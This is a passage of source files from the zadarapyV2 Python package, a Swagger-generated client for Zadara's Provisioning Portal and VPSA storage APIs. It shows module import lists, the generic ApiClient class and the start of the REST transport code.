from ProvisioningPortal.models.inline_response2001_zones import InlineResponse2001Zones
from ProvisioningPortal.models.inline_response2002 import InlineResponse2002
from ProvisioningPortal.models.inline_response20020 import InlineResponse20020
from ProvisioningPortal.models.inline_response20021 import InlineResponse20021
from ProvisioningPortal.models.inline_response20022 import InlineResponse20022
from ProvisioningPortal.models.inline_response20023 import InlineResponse20023
from ProvisioningPortal.models.inline_response20024 import InlineResponse20024
from ProvisioningPortal.models.inline_response20025 import InlineResponse20025
from ProvisioningPortal.models.inline_response20026 import InlineResponse20026
from ProvisioningPortal.models.inline_response20027 import InlineResponse20027
from ProvisioningPortal.models.inline_response20028 import InlineResponse20028
from ProvisioningPortal.models.inline_response20029 import InlineResponse20029
from ProvisioningPortal.models.inline_response20029_data import InlineResponse20029Data
from ProvisioningPortal.models.inline_response2002_data import InlineResponse2002Data
from ProvisioningPortal.models.inline_response2003 import InlineResponse2003
from ProvisioningPortal.models.inline_response20030 import InlineResponse20030
from ProvisioningPortal.models.inline_response20031 import InlineResponse20031
from ProvisioningPortal.models.inline_response20032 import InlineResponse20032
from ProvisioningPortal.models.inline_response20033 import InlineResponse20033
from ProvisioningPortal.models.inline_response20034 import InlineResponse20034
from ProvisioningPortal.models.inline_response20034_data import InlineResponse20034Data
from ProvisioningPortal.models.inline_response20035 import InlineResponse20035
from ProvisioningPortal.models.inline_response20036 import InlineResponse20036
from ProvisioningPortal.models.inline_response20037 import InlineResponse20037
from ProvisioningPortal.models.inline_response20038 import InlineResponse20038
from ProvisioningPortal.models.inline_response20038_data import InlineResponse20038Data
from ProvisioningPortal.models.inline_response20039 import InlineResponse20039
from ProvisioningPortal.models.inline_response20039_data import InlineResponse20039Data
from ProvisioningPortal.models.inline_response2004 import InlineResponse2004
from ProvisioningPortal.models.inline_response20040 import InlineResponse20040
from ProvisioningPortal.models.inline_response20041 import InlineResponse20041
from ProvisioningPortal.models.inline_response20042 import InlineResponse20042
from ProvisioningPortal.models.inline_response20042_data import InlineResponse20042Data
from ProvisioningPortal.models.inline_response20043 import InlineResponse20043
from ProvisioningPortal.models.inline_response20044 import InlineResponse20044
from ProvisioningPortal.models.inline_response20044_data import InlineResponse20044Data
from ProvisioningPortal.models.inline_response20045 import InlineResponse20045
from ProvisioningPortal.models.inline_response20045_data import InlineResponse20045Data
from ProvisioningPortal.models.inline_response20045_data_zios import InlineResponse20045DataZios
from ProvisioningPortal.models.inline_response2005 import InlineResponse2005
from ProvisioningPortal.models.inline_response2005_data import InlineResponse2005Data
from ProvisioningPortal.models.inline_response2006 import InlineResponse2006
from ProvisioningPortal.models.inline_response2006_data import InlineResponse2006Data
from ProvisioningPortal.models.inline_response2007 import InlineResponse2007
from ProvisioningPortal.models.inline_response2008 import InlineResponse2008
from ProvisioningPortal.models.inline_response2008_data import InlineResponse2008Data
from ProvisioningPortal.models.inline_response2008_data_provider_groups import InlineResponse2008DataProviderGroups
from ProvisioningPortal.models.inline_response2009 import InlineResponse2009
from ProvisioningPortal.models.inline_response2009_data import InlineResponse2009Data
from ProvisioningPortal.models.inline_response200_data import InlineResponse200Data
from ProvisioningPortal.models.vpsasvpsa_iddrives_json_drives import VpsasvpsaIddrivesJsonDrives
from ProvisioningPortal.models.zios_json_drives import ZiosJsonDrives | zadarapyV2 | /zadarapyV2-23.8.4.tar.gz/zadarapyV2-23.8.4/ProvisioningPortal/__init__.py | __init__.py |
# flake8: noqa
"""
Zadara Provisioning Portal API
# Overview This document outlines the methods available for creation and high-level administration of Zadara Storage VPSAs via a Zadara Storage Provisioning Portal. This API supports form-encoded requests, and can return either JSON or XML responses. ## Endpoint The base URL for the requests is the Provisioning Portal URL you created your VPSA through - for example: https://manage.zadarastorage.com/, and all APIs will be prefixed with /api as noted in the documentation below. ## Authentication To use this API, an authentication token is required. The API for retrieving this token can be found below in the Authentication section. You may pass this token in requests either via the the X-Token header or via basic authentication (base64 encoded) in Authorization header. ## Questions If you have any questions or need support involving the REST API, please contact for assistance. # noqa: E501
OpenAPI spec version: v23.8.4
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import models into model package
from ProvisioningPortal.models.body_add_proxy_vc_to_vpsa_object_storage import BodyAddProxyVcToVpsaObjectStorage
from ProvisioningPortal.models.body_add_proxy_vc_to_zios import BodyAddProxyVcToZios
from ProvisioningPortal.models.body_add_storage_policy_to_vpsa_object_storage import BodyAddStoragePolicyToVpsaObjectStorage
from ProvisioningPortal.models.body_add_storage_to_vpsa import BodyAddStorageToVpsa
from ProvisioningPortal.models.body_add_virtual_network_vpsa import BodyAddVirtualNetworkVpsa
from ProvisioningPortal.models.body_alloacate_vlan import BodyAlloacateVlan
from ProvisioningPortal.models.body_approve import BodyApprove
from ProvisioningPortal.models.body_change_vpsa_flash_cache_capacity import BodyChangeVpsaFlashCacheCapacity
from ProvisioningPortal.models.body_change_vpsa_zadara_engine import BodyChangeVpsaZadaraEngine
from ProvisioningPortal.models.body_create_cloud import BodyCreateCloud
from ProvisioningPortal.models.body_create_object_storage_account import BodyCreateObjectStorageAccount
from ProvisioningPortal.models.body_create_provider import BodyCreateProvider
from ProvisioningPortal.models.body_create_provider_group import BodyCreateProviderGroup
from ProvisioningPortal.models.body_create_zios import BodyCreateZios
from ProvisioningPortal.models.body_deallocate_vlan import BodyDeallocateVlan
from ProvisioningPortal.models.body_delete_virtual_networks import BodyDeleteVirtualNetworks
from ProvisioningPortal.models.body_deny import BodyDeny
from ProvisioningPortal.models.body_enable_object_account import BodyEnableObjectAccount
from ProvisioningPortal.models.body_get_authentication_token import BodyGetAuthenticationToken
from ProvisioningPortal.models.body_list_availiable_vlan_for_provider import BodyListAvailiableVlanForProvider
from ProvisioningPortal.models.body_remove_vni_from_vpsa import BodyRemoveVniFromVpsa
from ProvisioningPortal.models.body_reset_authentication_token import BodyResetAuthenticationToken
from ProvisioningPortal.models.body_set_flavor_price import BodySetFlavorPrice
from ProvisioningPortal.models.body_set_vlan_as_default import BodySetVlanAsDefault
from ProvisioningPortal.models.body_update_cloud import BodyUpdateCloud
from ProvisioningPortal.models.body_update_object_account import BodyUpdateObjectAccount
from ProvisioningPortal.models.body_update_provider import BodyUpdateProvider
from ProvisioningPortal.models.body_update_provider_group import BodyUpdateProviderGroup
from ProvisioningPortal.models.default import Default
from ProvisioningPortal.models.default_response import DefaultResponse
from ProvisioningPortal.models.error import Error
from ProvisioningPortal.models.inline_response200 import InlineResponse200
from ProvisioningPortal.models.inline_response2001 import InlineResponse2001
from ProvisioningPortal.models.inline_response20010 import InlineResponse20010
from ProvisioningPortal.models.inline_response20010_data import InlineResponse20010Data
from ProvisioningPortal.models.inline_response20011 import InlineResponse20011
from ProvisioningPortal.models.inline_response20011_data import InlineResponse20011Data
from ProvisioningPortal.models.inline_response20012 import InlineResponse20012
from ProvisioningPortal.models.inline_response20012_data import InlineResponse20012Data
from ProvisioningPortal.models.inline_response20013 import InlineResponse20013
from ProvisioningPortal.models.inline_response20014 import InlineResponse20014
from ProvisioningPortal.models.inline_response20014_data import InlineResponse20014Data
from ProvisioningPortal.models.inline_response20015 import InlineResponse20015
from ProvisioningPortal.models.inline_response20016 import InlineResponse20016
from ProvisioningPortal.models.inline_response20017 import InlineResponse20017
from ProvisioningPortal.models.inline_response20018 import InlineResponse20018
from ProvisioningPortal.models.inline_response20018_data import InlineResponse20018Data
from ProvisioningPortal.models.inline_response20018_data_datum import InlineResponse20018DataDatum
from ProvisioningPortal.models.inline_response20018_data_datum_app_engine import InlineResponse20018DataDatumAppEngine
from ProvisioningPortal.models.inline_response20018_data_datum_cache import InlineResponse20018DataDatumCache
from ProvisioningPortal.models.inline_response20018_data_datum_engine import InlineResponse20018DataDatumEngine
from ProvisioningPortal.models.inline_response20018_data_datum_provider import InlineResponse20018DataDatumProvider
from ProvisioningPortal.models.inline_response20019 import InlineResponse20019
from ProvisioningPortal.models.inline_response20019_data import InlineResponse20019Data
from ProvisioningPortal.models.inline_response20019_data_app_engine import InlineResponse20019DataAppEngine
from ProvisioningPortal.models.inline_response20019_data_cache import InlineResponse20019DataCache
from ProvisioningPortal.models.inline_response20019_data_drives import InlineResponse20019DataDrives
from ProvisioningPortal.models.inline_response20019_data_engine import InlineResponse20019DataEngine
from ProvisioningPortal.models.inline_response20019_data_ipv6_address import InlineResponse20019DataIpv6Address
from ProvisioningPortal.models.inline_response20019_data_provider import InlineResponse20019DataProvider
from ProvisioningPortal.models.inline_response20019_data_publiczios import InlineResponse20019DataPubliczios
from ProvisioningPortal.models.inline_response20019_data_storage_policies import InlineResponse20019DataStoragePolicies
from ProvisioningPortal.models.inline_response2001_app_engines import InlineResponse2001AppEngines
from ProvisioningPortal.models.inline_response2001_cache import InlineResponse2001Cache
from ProvisioningPortal.models.inline_response2001_data import InlineResponse2001Data
from ProvisioningPortal.models.inline_response2001_drive_types import InlineResponse2001DriveTypes
from ProvisioningPortal.models.inline_response2001_engine_types import InlineResponse2001EngineTypes
from ProvisioningPortal.models.inline_response2001_fibre_channel import InlineResponse2001FibreChannel
from ProvisioningPortal.models.inline_response2001_flash_cache import InlineResponse2001FlashCache
from ProvisioningPortal.models.inline_response2001_vpsazone_group_storage_policy_types import InlineResponse2001VpsazoneGroupStoragePolicyTypes
from ProvisioningPortal.models.inline_response2001_zones import InlineResponse2001Zones
from ProvisioningPortal.models.inline_response2002 import InlineResponse2002
from ProvisioningPortal.models.inline_response20020 import InlineResponse20020
from ProvisioningPortal.models.inline_response20021 import InlineResponse20021
from ProvisioningPortal.models.inline_response20022 import InlineResponse20022
from ProvisioningPortal.models.inline_response20023 import InlineResponse20023
from ProvisioningPortal.models.inline_response20024 import InlineResponse20024
from ProvisioningPortal.models.inline_response20025 import InlineResponse20025
from ProvisioningPortal.models.inline_response20026 import InlineResponse20026
from ProvisioningPortal.models.inline_response20027 import InlineResponse20027
from ProvisioningPortal.models.inline_response20028 import InlineResponse20028
from ProvisioningPortal.models.inline_response20029 import InlineResponse20029
from ProvisioningPortal.models.inline_response20029_data import InlineResponse20029Data
from ProvisioningPortal.models.inline_response2002_data import InlineResponse2002Data
from ProvisioningPortal.models.inline_response2003 import InlineResponse2003
from ProvisioningPortal.models.inline_response20030 import InlineResponse20030
from ProvisioningPortal.models.inline_response20031 import InlineResponse20031
from ProvisioningPortal.models.inline_response20032 import InlineResponse20032
from ProvisioningPortal.models.inline_response20033 import InlineResponse20033
from ProvisioningPortal.models.inline_response20034 import InlineResponse20034
from ProvisioningPortal.models.inline_response20034_data import InlineResponse20034Data
from ProvisioningPortal.models.inline_response20035 import InlineResponse20035
from ProvisioningPortal.models.inline_response20036 import InlineResponse20036
from ProvisioningPortal.models.inline_response20037 import InlineResponse20037
from ProvisioningPortal.models.inline_response20038 import InlineResponse20038
from ProvisioningPortal.models.inline_response20038_data import InlineResponse20038Data
from ProvisioningPortal.models.inline_response20039 import InlineResponse20039
from ProvisioningPortal.models.inline_response20039_data import InlineResponse20039Data
from ProvisioningPortal.models.inline_response2004 import InlineResponse2004
from ProvisioningPortal.models.inline_response20040 import InlineResponse20040
from ProvisioningPortal.models.inline_response20041 import InlineResponse20041
from ProvisioningPortal.models.inline_response20042 import InlineResponse20042
from ProvisioningPortal.models.inline_response20042_data import InlineResponse20042Data
from ProvisioningPortal.models.inline_response20043 import InlineResponse20043
from ProvisioningPortal.models.inline_response20044 import InlineResponse20044
from ProvisioningPortal.models.inline_response20044_data import InlineResponse20044Data
from ProvisioningPortal.models.inline_response20045 import InlineResponse20045
from ProvisioningPortal.models.inline_response20045_data import InlineResponse20045Data
from ProvisioningPortal.models.inline_response20045_data_zios import InlineResponse20045DataZios
from ProvisioningPortal.models.inline_response2005 import InlineResponse2005
from ProvisioningPortal.models.inline_response2005_data import InlineResponse2005Data
from ProvisioningPortal.models.inline_response2006 import InlineResponse2006
from ProvisioningPortal.models.inline_response2006_data import InlineResponse2006Data
from ProvisioningPortal.models.inline_response2007 import InlineResponse2007
from ProvisioningPortal.models.inline_response2008 import InlineResponse2008
from ProvisioningPortal.models.inline_response2008_data import InlineResponse2008Data
from ProvisioningPortal.models.inline_response2008_data_provider_groups import InlineResponse2008DataProviderGroups
from ProvisioningPortal.models.inline_response2009 import InlineResponse2009
from ProvisioningPortal.models.inline_response2009_data import InlineResponse2009Data
from ProvisioningPortal.models.inline_response200_data import InlineResponse200Data
from ProvisioningPortal.models.vpsasvpsa_iddrives_json_drives import VpsasvpsaIddrivesJsonDrives
from ProvisioningPortal.models.zios_json_drives import ZiosJsonDrives | zadarapyV2 | /zadarapyV2-23.8.4.tar.gz/zadarapyV2-23.8.4/ProvisioningPortal/models/__init__.py | __init__.py |
from __future__ import absolute_import
import datetime
import json
import mimetypes
from multiprocessing.pool import ThreadPool
import os
import re
import tempfile
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from Vpsa.configuration import Configuration
import Vpsa.models
from Vpsa import rest
class ApiClient(object):
"""Generic API client for Swagger client library builds.
Swagger generic API client. This client handles the client-
server communication, and is invariant across implementations. Specifics of
the methods and models for each application are generated from the Swagger
templates.
NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
:param configuration: .Configuration object for this client
:param header_name: a header to pass when making calls to the API.
:param header_value: a header value to pass when making calls to
the API.
:param cookie: a cookie to include in the header when making calls
to the API
"""
PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if six.PY3 else long, # noqa: F821
'float': float,
'str': str,
'bool': bool,
'date': datetime.date,
'datetime': datetime.datetime,
'object': object,
}
def __init__(self, configuration=None, header_name=None, header_value=None,
cookie=None):
if configuration is None:
configuration = Configuration()
self.configuration = configuration
# Use the pool property to lazily initialize the ThreadPool.
self._pool = None
self.rest_client = rest.RESTClientObject(configuration)
self.default_headers = {}
if header_name is not None:
self.default_headers[header_name] = header_value
self.cookie = cookie
# Set default User-Agent.
self.user_agent = 'Swagger-Codegen/1.0.0/python'
self.client_side_validation = configuration.client_side_validation
def __del__(self):
if self._pool is not None:
self._pool.close()
self._pool.join()
@property
def pool(self):
if self._pool is None:
self._pool = ThreadPool()
return self._pool
@property
def user_agent(self):
"""User agent for this API client"""
return self.default_headers['User-Agent']
@user_agent.setter
def user_agent(self, value):
self.default_headers['User-Agent'] = value
def set_default_header(self, header_name, header_value):
self.default_headers[header_name] = header_value
def __call_api(
self, resource_path, method, path_params=None,
query_params=None, header_params=None, body=None, post_params=None,
files=None, response_type=None, auth_settings=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
config = self.configuration
# header parameters
header_params = header_params or {}
header_params.update(self.default_headers)
if self.cookie:
header_params['Cookie'] = self.cookie
if header_params:
header_params = self.sanitize_for_serialization(header_params)
header_params = dict(self.parameters_to_tuples(header_params,
collection_formats))
# path parameters
if path_params:
path_params = self.sanitize_for_serialization(path_params)
path_params = self.parameters_to_tuples(path_params,
collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
resource_path = resource_path.replace(
'{%s}' % k,
quote(str(v), safe=config.safe_chars_for_path_param)
)
# query parameters
if query_params:
query_params = self.sanitize_for_serialization(query_params)
query_params = self.parameters_to_tuples(query_params,
collection_formats)
# post parameters
if post_params or files:
post_params = self.prepare_post_parameters(post_params, files)
post_params = self.sanitize_for_serialization(post_params)
post_params = self.parameters_to_tuples(post_params,
collection_formats)
# auth setting
self.update_params_for_auth(header_params, query_params, auth_settings)
# body
if body:
body = self.sanitize_for_serialization(body)
# request url
url = self.configuration.host + resource_path
# perform request and return response
response_data = self.request(
method, url, query_params=query_params, headers=header_params,
post_params=post_params, body=body,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
self.last_response = response_data
return_data = response_data
if _preload_content:
# deserialize response data
if response_type:
return_data = self.deserialize(response_data, response_type)
else:
return_data = None
if _return_http_data_only:
return (return_data)
else:
return (return_data, response_data.status,
response_data.getheaders())
def sanitize_for_serialization(self, obj):
"""Builds a JSON POST object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is swagger model, return the properties dict.
:param obj: The data to serialize.
:return: The serialized form of data.
"""
if obj is None:
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
return [self.sanitize_for_serialization(sub_obj)
for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple(self.sanitize_for_serialization(sub_obj)
for sub_obj in obj)
elif isinstance(obj, (datetime.datetime, datetime.date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
else:
# Convert model obj to dict except
# attributes `swagger_types`, `attribute_map`
# and attributes which value is not None.
# Convert attribute name to json key in
# model definition for request.
obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
for attr, _ in six.iteritems(obj.swagger_types)
if getattr(obj, attr) is not None}
return {key: self.sanitize_for_serialization(val)
for key, val in six.iteritems(obj_dict)}
def deserialize(self, response, response_type):
"""Deserializes response into an object.
:param response: RESTResponse object to be deserialized.
:param response_type: class literal for
deserialized object, or string of class name.
:return: deserialized object.
"""
# handle file downloading
# save response body into a tmp file and return the instance
if response_type == "file":
return self.__deserialize_file(response)
# fetch data from response object
try:
data = json.loads(response.data)
except ValueError:
data = response.data
return self.__deserialize(data, response_type)
def __deserialize(self, data, klass):
"""Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if type(klass) == str:
if klass.startswith('list['):
sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
return [self.__deserialize(sub_data, sub_kls)
for sub_data in data]
if klass.startswith('dict('):
sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
return {k: self.__deserialize(v, sub_kls)
for k, v in six.iteritems(data)}
# convert str to class
if klass in self.NATIVE_TYPES_MAPPING:
klass = self.NATIVE_TYPES_MAPPING[klass]
else:
klass = getattr(Vpsa.models, klass)
if klass in self.PRIMITIVE_TYPES:
return self.__deserialize_primitive(data, klass)
elif klass == object:
return self.__deserialize_object(data)
elif klass == datetime.date:
return self.__deserialize_date(data)
elif klass == datetime.datetime:
return self.__deserialize_datatime(data)
else:
return self.__deserialize_model(data, klass)
def call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, async_req=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
"""Makes the HTTP request (synchronous) and returns deserialized data.
To make an async request, set the async_req parameter.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response: Response data type.
:param files dict: key -> filename, value -> filepath,
for `multipart/form-data`.
:param async_req bool: execute request asynchronously
:param _return_http_data_only: response data without head status code
and headers
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return:
If async_req parameter is True,
the request will be called asynchronously.
The method will return the request thread.
If parameter async_req is False or missing,
then the method will return the response directly.
"""
if not async_req:
return self.__call_api(resource_path, method,
path_params, query_params, header_params,
body, post_params, files,
response_type, auth_settings,
_return_http_data_only, collection_formats,
_preload_content, _request_timeout)
else:
thread = self.pool.apply_async(self.__call_api, (resource_path,
method, path_params, query_params,
header_params, body,
post_params, files,
response_type, auth_settings,
_return_http_data_only,
collection_formats,
_preload_content, _request_timeout))
return thread
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True,
_request_timeout=None):
"""Makes the HTTP request using RESTClient."""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
:return: Parameters as list of tuples, collections formatted
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in six.iteritems(params) if isinstance(params, dict) else params: # noqa: E501
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
def prepare_post_parameters(self, post_params=None, files=None):
"""Builds form parameters.
:param post_params: Normal form parameters.
:param files: File parameters.
:return: Form parameters with files.
"""
params = []
if post_params:
params = post_params
if files:
for k, v in six.iteritems(files):
if not v:
continue
file_names = v if type(v) is list else [v]
for n in file_names:
with open(n, 'rb') as f:
filename = os.path.basename(f.name)
filedata = f.read()
mimetype = (mimetypes.guess_type(filename)[0] or
'application/octet-stream')
params.append(
tuple([k, tuple([filename, filedata, mimetype])]))
return params
def select_header_accept(self, accepts):
"""Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings):
"""Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
"""
if not auth_settings:
return
for auth in auth_settings:
auth_setting = self.configuration.auth_settings().get(auth)
if auth_setting:
if not auth_setting['value']:
continue
elif auth_setting['in'] == 'header':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ValueError(
'Authentication token must be in `query` or `header`'
)
def __deserialize_file(self, response):
"""Deserializes body to file
Saves response body into a file in a temporary folder,
using the filename from the `Content-Disposition` header if provided.
:param response: RESTResponse.
:return: file path.
"""
fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
os.close(fd)
os.remove(path)
content_disposition = response.getheader("Content-Disposition")
if content_disposition:
filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
content_disposition).group(1)
path = os.path.join(os.path.dirname(path), filename)
with open(path, "w") as f:
f.write(response.data)
return path
def __deserialize_primitive(self, data, klass):
"""Deserializes string to primitive type.
:param data: str.
:param klass: class literal.
:return: int, long, float, str, bool.
"""
try:
return klass(data)
except UnicodeEncodeError:
return six.text_type(data)
except TypeError:
return data
def __deserialize_object(self, value):
"""Return a original value.
:return: object.
"""
return value
def __deserialize_date(self, string):
"""Deserializes string to date.
:param string: str.
:return: date.
"""
try:
from dateutil.parser import parse
return parse(string).date()
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason="Failed to parse `{0}` as date object".format(string)
)
def __deserialize_datatime(self, string):
"""Deserializes string to datetime.
The string should be in iso8601 datetime format.
:param string: str.
:return: datetime.
"""
try:
from dateutil.parser import parse
return parse(string)
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason=(
"Failed to parse `{0}` as datetime object"
.format(string)
)
)
def __hasattr(self, object, name):
return name in object.__class__.__dict__
def __deserialize_model(self, data, klass):
"""Deserializes list or dict to model.
:param data: dict, list.
:param klass: class literal.
:return: model object.
"""
if (not klass.swagger_types and
not self.__hasattr(klass, 'get_real_child_model')):
return data
kwargs = {}
if klass.swagger_types is not None:
for attr, attr_type in six.iteritems(klass.swagger_types):
if (data is not None and
klass.attribute_map[attr] in data and
isinstance(data, (list, dict))):
value = data[klass.attribute_map[attr]]
kwargs[attr] = self.__deserialize(value, attr_type)
instance = klass(**kwargs)
if (isinstance(instance, dict) and
klass.swagger_types is not None and
isinstance(data, dict)):
for key, value in data.items():
if key not in klass.swagger_types:
instance[key] = value
if self.__hasattr(instance, 'get_real_child_model'):
klass_name = instance.get_real_child_model(data)
if klass_name:
instance = self.__deserialize(data, klass_name)
return instance | zadarapyV2 | /zadarapyV2-23.8.4.tar.gz/zadarapyV2-23.8.4/Vpsa/api_client.py | api_client.py |
from __future__ import absolute_import
import io
import json
import logging
import re
import ssl
import certifi
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import urlencode
try:
import urllib3
except ImportError:
raise ImportError('Swagger python client requires urllib3.')
logger = logging.getLogger(__name__)
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""Returns a dictionary of the response headers."""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""Returns a given response header."""
return self.urllib3_response.getheader(name, default)
class RESTClientObject(object):
def __init__(self, configuration, pools_size=4, maxsize=None):
# urllib3.PoolManager will pass all kw parameters to connectionpool
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/poolmanager.py#L75 # noqa: E501
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/connectionpool.py#L680 # noqa: E501
# maxsize is the number of requests to host that are allowed in parallel # noqa: E501
# Custom SSL certificates and client certificates: http://urllib3.readthedocs.io/en/latest/advanced-usage.html # noqa: E501
# cert_reqs
if configuration.verify_ssl:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
# ca_certs
if configuration.ssl_ca_cert:
ca_certs = configuration.ssl_ca_cert
else:
# if not set certificate file, use Mozilla's root certificates.
ca_certs = certifi.where()
addition_pool_args = {}
if configuration.assert_hostname is not None:
addition_pool_args['assert_hostname'] = configuration.assert_hostname # noqa: E501
if maxsize is None:
if configuration.connection_pool_maxsize is not None:
maxsize = configuration.connection_pool_maxsize
else:
maxsize = 4
# https pool manager
if configuration.proxy:
self.pool_manager = urllib3.ProxyManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
proxy_url=configuration.proxy,
**addition_pool_args
)
else:
self.pool_manager = urllib3.PoolManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
**addition_pool_args
)
def request(self, method, url, query_params=None, headers=None,
body=None, post_params=None, _preload_content=True,
_request_timeout=None):
"""Perform requests.
:param method: http request method
:param url: http request url
:param query_params: query parameters in the url
:param headers: http request headers
:param body: request json body, for `application/json`
:param post_params: request post parameters,
`application/x-www-form-urlencoded`
and `multipart/form-data`
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
"""
method = method.upper()
assert method in ['GET', 'HEAD', 'DELETE', 'POST', 'PUT',
'PATCH', 'OPTIONS']
if post_params and body:
raise ValueError(
"body parameter cannot be used with post_params parameter."
)
post_params = post_params or {}
headers = headers or {}
timeout = None
if _request_timeout:
if isinstance(_request_timeout, (int, ) if six.PY3 else (int, long)): # noqa: E501,F821
timeout = urllib3.Timeout(total=_request_timeout)
elif (isinstance(_request_timeout, tuple) and
len(_request_timeout) == 2):
timeout = urllib3.Timeout(
connect=_request_timeout[0], read=_request_timeout[1])
if 'Content-Type' not in headers:
headers['Content-Type'] = 'application/json'
try:
# For `POST`, `PUT`, `PATCH`, `OPTIONS`, `DELETE`
if method in ['POST', 'PUT', 'PATCH', 'OPTIONS', 'DELETE']:
if query_params:
url += '?' + urlencode(query_params)
if re.search('json', headers['Content-Type'], re.IGNORECASE):
request_body = '{}'
if body is not None:
request_body = json.dumps(body)
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'application/x-www-form-urlencoded': # noqa: E501
r = self.pool_manager.request(
method, url,
fields=post_params,
